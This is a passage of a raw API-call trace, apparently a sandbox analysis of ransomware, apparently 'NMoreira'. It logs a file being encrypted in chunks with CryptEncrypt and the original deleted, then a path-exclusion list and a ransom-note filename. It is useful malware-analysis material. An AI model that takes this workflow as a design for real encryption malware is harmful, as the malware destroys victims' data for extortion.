lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.207] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.207] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.207] GetLastError () returned 0x0 [0163.207] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.208] GetLastError () returned 0x0 [0163.208] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.208] GetLastError () returned 0x0 [0163.208] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.208] GetLastError () returned 0x0 [0163.208] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.208] GetLastError () returned 0x0 [0163.208] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.208] GetLastError () returned 0x0 [0163.208] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.208] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.208] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.209] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.209] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.209] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.209] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x94, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x94, lpOverlapped=0x0) returned 1 [0163.209] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x94, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xa0) returned 1 [0163.209] GetLastError () returned 0x0 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xa0, lpOverlapped=0x0) returned 1 [0163.209] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.209] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.210] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0x20 [0163.210] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf", dwFileAttributes=0x20) returned 0 [0163.210] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf") returned 1 [0163.210] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf")) returned 0 [0163.210] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" [0163.210] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.210] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF0F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf0f3.tmp")) returned 0xf0f3 [0163.211] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF0F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf0f3.tmp"), dwFlags=0x1) returned 0 [0163.211] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF0F3.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf0f3.tmp")) returned 1 [0163.211] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0163.211] wcslen (_String="OK") returned 0x2 [0163.211] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.211] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.211] CryptDestroyKey (hKey=0x9ad578) returned 1 [0163.211] CryptDestroyHash (hHash=0x9ad378) returned 1 [0163.211] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0163.211] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*NMCRYPT") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*Recovers your files.html") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.exe") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.dll") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.lnk") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.bat") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.ini") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.msi") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*.scf") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*pagefile.sys*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*NTUSER.DAT*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*AppData*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\winrar\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\java\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\windows\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\ESET\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\AVG\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\AVIRA\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*Atheros*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*Realtek*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*bootmgr*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*boot*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*boot*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*CONFIG.SYS*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*IO.SYS*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*MSDOS.SYS*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*NTDETECT.COM*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*ntldr*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*chrome*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*opera*") returned 0 [0163.212] PathMatchSpecW (pszFile="Genko_2.emf", pszSpec="*firefox*") returned 0 [0163.212] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_2.emf", pszSpec="*") returned 1 [0163.212] strlen (_Str="NMoreira") returned 0x8 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.212] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.213] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 